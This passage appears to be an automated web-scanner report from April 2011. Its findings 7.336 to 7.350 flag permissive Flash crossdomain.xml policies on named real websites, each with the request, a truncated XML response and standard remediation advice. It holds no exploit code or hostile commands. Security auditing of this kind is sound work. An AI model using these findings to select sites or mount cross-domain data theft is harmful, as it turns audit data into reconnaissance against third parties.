Host: www.megavideo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:18 GMT
Server: Apache
Last-Modified: Mon, 29 Nov 2010 03:41:12 GMT
ETag: "23ba86c-2a2-49628d7e7e600"
Accept-Ranges: bytes
Content-Length: 674
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.megarotic.com" />
<allow-access-from domain="*.sexuploader.com" />
<allow-access-from domain="*.megaupload.com" />
<allow-access-from domain="*.megarotic.com" />
<allow-access-from domain="*.megaupload.com" />
<allow-access-from domain="*.megavideo.com" />
<allow-access-from domain="*.megaflirt.com" />
<allow-access-from domain="*.megaporn.com" />
<allow-access-from domain="*.megaking.com" />
<allow-access-from domain="*.megagogo.com" />
<allow-access-from domain="*.megahelp.com" />
<allow-access-from domain="*.megabest.com" />
<allow-access-from domain="*.megabox.com" />
...[SNIP]...

7.336. http://www.merck.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.merck.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.merck.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:16 GMT
Server: Apache
Set-Cookie: unique_visitor=173.193.214.243.1301752756992629; path=/; expires=Sun, 01-Apr-12 13:59:16 GMT
Last-Modified: Sun, 07 Mar 2010 22:22:21 GMT
ETag: "678c00-d7-61d24140"
Accept-Ranges: bytes
Content-Length: 215
P3P: policyref="http://www.merck.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OUR DELa LEG PHY ONL UNI COM NAV INT DEM STA HEA PRE LOC"
Connection: close
Content-Type: application/xml
Set-Cookie: BIGipServerwww.merck.com-HTTP=42274988.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*. akamai.net" />
</cross-
...[SNIP]...

7.337. http://www.merriam-webster.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.merriam-webster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.merriam-webster.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 21 Aug 2010 17:55:02 GMT
ETag: "33c24f-147-48e591d522980"
Content-Type: application/xml
Content-Length: 327
Date: Sat, 02 Apr 2011 12:44:02 GMT
X-Varnish: 589058149
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>        
<allow-access-from domain="vindicoasset.edgesuite.net" />
<allow-access-from domain="*.m-w.com" />
<allow-access-from domain="*.merriam-webster.com" />
...[SNIP]...

7.338. http://www.military.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.military.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.military.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:32 GMT
Server: Apache
Cache-Control: max-age=6000
Expires: Sat, 02 Apr 2011 15:08:32 GMT
Last-Modified: Thu, 08 Nov 2007 18:12:47 GMT
ETag: "9c46-79-4733519f"
Accept-Ranges: bytes
Content-Length: 121
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.military.com" />
</cross-domain-policy>


7.339. http://www.mindjolt.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mindjolt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mindjolt.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 04 Jan 2010 21:49:49 GMT
ETag: "360144-1df-47c5db34fd940"
Accept-Ranges: bytes
Content-Length: 479
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="static.mindjolt.com" />
<allow-access-from domain="cache.mindjolt.com" />
<allow-access-from domain="flash.mindjolt.com" />
<allow-access-from domain="cdn.mindjolt.com" />
<allow-access-from domain="*.mindjolt.com" />
<allow-access-from domain="devflash.mindjolt.com" />
...[SNIP]...

7.340. http://www.miniclip.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.miniclip.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.miniclip.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Fri, 04 Mar 2011 15:14:10 GMT
ETag: "644c-683-49da999127480"
Content-Type: text/xml
X-Cacheable: YES
Content-Length: 1667
Date: Sat, 02 Apr 2011 13:25:39 GMT
X-Varnish: 420130408 420121234
Age: 484
Via: 1.1 varnish
Connection: close
X-Served-By: webftl77
X-Cache: HIT
X-Cache-Hits: 16

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="66.165.172.181" />
   <allow-access-from domain="85.112.4.227" />
   <allow-access-from domain="76.74.147.153" />
   <allow-access-from domain="76.74.147.154" />
   <allow-access-from domain="77.73.32.96" />
   <allow-access-from domain="77.73.32.120" />
   <allow-access-from domain="77.73.36.99" />
   <allow-access-from domain="miniclip.com" />
   <allow-access-from domain="*.miniclip.com" />
   <allow-access-from domain="*.icq.com" />
   <allow-access-from domain="ads.miniclip.com" />
   <allow-access-from domain="cms.miniclip.com" />
   <allow-access-from domain="devcms.miniclip.com" />
   <allow-access-from domain="bakery.devcms.miniclip.com" />
   <allow-access-from domain="developers.miniclip.com" />
   <allow-access-from domain="limao.miniclip.com" />
   <allow-access-from domain="www.sketchstar.com" />
   <allow-access-from domain="gamebakers.com" />
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" />
   <allow-access-from domain="facebook.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="apps.facebook.com" />
   <allow-access-from domain="facebook.beta.cms.miniclip.com" />
   <allow-access-from domain="facebook.beta.devcms.miniclip.com" />
   <allow-access-from domain="chat.kongregate.com" />
   <allow-access-from domain="www.newgrounds.com" />
   <allow-access-from domain="uploads.ungrounded.net" />
   <allow-access-from domain="www.basoft.co.uk" />
...[SNIP]...

7.341. http://www.miracleworkers.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.miracleworkers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.miracleworkers.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Wed, 19 Jan 2011 13:51:09 GMT
Accept-Ranges: bytes
ETag: "d62146eddfb7cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sat, 02 Apr 2011 13:54:04 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...

7.342. http://www.mocospace.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mocospace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mocospace.com

Response

HTTP/1.0 200 OK
Server: Resin/4.0.6
ETag: "HMreoUE2dEZ"
Last-Modified: Wed, 30 Mar 2011 14:01:53 GMT
Accept-Ranges: bytes
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Content-Length: 702
Date: Sat, 02 Apr 2011 13:53:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*.edgesuite.net" />
   <allow-access-from domain="img.mocospace.com.edgesuite.net" />
   <allow-access-from domain="*.mocospace.com" />
   <allow-access-from domain="mocospace.com" />
   <allow-access-from domain="*.sixthgearstudios.com" />
   <allow-access-from domain="sixthgearstudios.com" />
   <allow-access-from domain="*.buddylube.com" />
   <allow-access-from domain="buddylube.com" />
...[SNIP]...

7.343. http://www.modelmayhem.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.modelmayhem.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.modelmayhem.com

Response

HTTP/1.1 200 OK
Server: IBSrv 1.0
Date: Sat, 02 Apr 2011 13:34:56 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 03 Nov 2009 23:44:35 GMT
ETag: "c0b934-11f-4778013969ec0"
Accept-Ranges: bytes
Content-Length: 287
Vary: Accept-Encoding
Set-Cookie: BIGipServermodelmayhem_POOL=1189417132.0.0000; path=/

<cross-domain-policy>
   <allow-access-from domain="*.llnwd.net" />
   <allow-access-from domain="*.modelmayhem.com" />
   <allow-access-from domain="*.ezpservices.com" />
   <allow-access-from domain="*.ezprints.com" />
   <allow-access-from domain="*.ezpservices.com" />
...[SNIP]...

7.344. http://www.moshimonsters.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.moshimonsters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moshimonsters.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:07 GMT
Server: Apache
Last-Modified: Wed, 19 Aug 2009 10:48:50 GMT
ETag: "7ac712-107-4717c6159c880"
Accept-Ranges: bytes
Content-Length: 263
Content-Type: application/xml
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>    
   <allow-access-from domain="*.moshimonsters.com" />
   <allow-access-from domain="*.mmcdn.net" />
...[SNIP]...

7.345. http://www.moviesunlimited.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.moviesunlimited.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moviesunlimited.com

Response

HTTP/1.1 200 OK
Content-Length: 389
Content-Type: text/xml
Last-Modified: Wed, 24 Jun 2009 13:43:34 GMT
Accept-Ranges: bytes
ETag: "b32792c4d1f4c91:3442"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:31 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="moviesunlimited.com" />
<allow-access-from domain="*.moviesunlimited.com" />
<allow-access-from domain="movieunlimited.com" />
<allow-access-from domain="*.movieunlimited.com" />
<allow-access-from domain="moviefanfare.com" />
   <allow-access-from domain="*.moviefanfare.com" />
...[SNIP]...

7.346. http://www.msnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 23 Feb 2011 23:37:53 GMT
Accept-Ranges: bytes
ETag: "801e8fb0b2d3cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:46:09 GMT
Connection: close
Content-Length: 3794

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
...[SNIP]...

7.347. http://www.mybloglog.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mybloglog.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mybloglog.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:42:53 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

7.348. http://www.mycokerewards.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mycokerewards.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mycokerewards.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 08 Mar 2010 11:29:26 GMT
ETag: "404531-3a8-60a69180"
Accept-Ranges: bytes
Content-Length: 936
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 13:35:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:35:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.mycokerewards.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mcrpointsplus.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dietcoke.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sprite.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fanta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.drinkvault.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dasani.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mycoke.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dietcoke.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cokezero.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.us.powerade.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.minutemaid.com" secure="false"/>
...[SNIP]...

7.349. http://www.myheritage.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myheritage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myheritage.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.2.9 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Tue, 30 Nov 2010 16:11:51 GMT
ETag: "8c93c0-78c-7247dfc0"
Accept-Ranges: bytes
Content-Length: 1932
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:41:03 GMT
Connection: close
Cache-Control: max-age=86400
Expires: Tue, 22 Mar 2011 08:09:34 GMT

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.myheritagefiles.com"/>
   <allow-access-from domain="*.myheritageimages.com"/>
   <allow-access-from domain="*.myheritage.com"/>
   <allow-access-from domain="*.myheritageonline.com"/>
   <allow-access-from domain="*.mhcache.com"/>
   <allow-access-from domain="*.mhtools.com"/>
   <allow-access-from domain="*.myheritage.ae"/>
   <allow-access-from domain="*.myheritage.cn"/>
   <allow-access-from domain="*.myheritage.co.il"/>
   <allow-access-from domain="*.myheritage.co.in"/>
   <allow-access-from domain="*.myheritage.co.kr"/>
   <allow-access-from domain="*.myheritage.com.br"/>
   <allow-access-from domain="*.myheritage.com.hr"/>
   <allow-access-from domain="*.myheritage.com.pt"/>
   <allow-access-from domain="*.myheritage.com.tr"/>
   <allow-access-from domain="*.myheritage.com.ua"/>
   <allow-access-from domain="*.myheritage.cz"/>
   <allow-access-from domain="*.myheritage.de"/>
   <allow-access-from domain="*.myheritage.dk"/>    
   <allow-access-from domain="*.myheritage.es"/>
   <allow-access-from domain="*.myheritage.fr"/>
   <allow-access-from domain="*.myheritage.gr"/>
   <allow-access-from domain="*.myheritage.hu"/>
   <allow-access-from domain="*.myheritage.ir"/>
   <allow-access-from domain="*.myheritage.it"/>
   <allow-access-from domain="*.myheritage.jp"/>
   <allow-access-from domain="*.myheritage.lt"/>    
   <allow-access-from domain="*.myheritage.nl"/>
   <allow-access-from domain="*.myheritage.no"/>
   <allow-access-from domain="*.myheritage.pl"/>
   <allow-access-from domain="*.myheritage.ro"/>
   <allow-access-from domain="*.myheritage.rs"/>
   <allow-access-from domain="*.myheritage.sk"/>
   <allow-access-from domain="*.myheritage.si"/>
   <allow-access-from domain="*.myheritage.se"/>
   <allow-access-from domain="69.93.254.120"/>
   <allow-access-from domain="69.93.254.81"/>
   <allow-access-from domain="69.93.254.88"/>
...[SNIP]...

7.350. http://www.mylifetime.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mylifetime.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mylifetime.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 26 Aug 2010 05:20:42 GMT
ETag: "1118e1ad8-6c4-48eb328d23e80"
Cteonnt-Length: 1732
RealServer: prodweb5
Content-Type: text/xml
Cache-Control: no-store
Expires: Sat, 02 Apr 2011 13:35:19 GMT
Date: Sat, 02 Apr 2011 13:35:19 GMT
Content-Length: 1732
Connection: close

<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"/>
<allow-access-from domain="*.mylifetime.com" secure="false"/>
<allow-access-from domain="*.ltcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tremormedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="web1.lifetimetelevision.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="web2.lifetimetelevision.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="web3.lifetimetelevision.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.lovespringinternational.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="dev.lovespringinternational.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb1.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb2.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb3.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb4.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb5.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb6.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb7.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb8.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb9.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="dev.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.bunchball.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.natalie.feedroom.com" secure="false"/>
...[SNIP]...
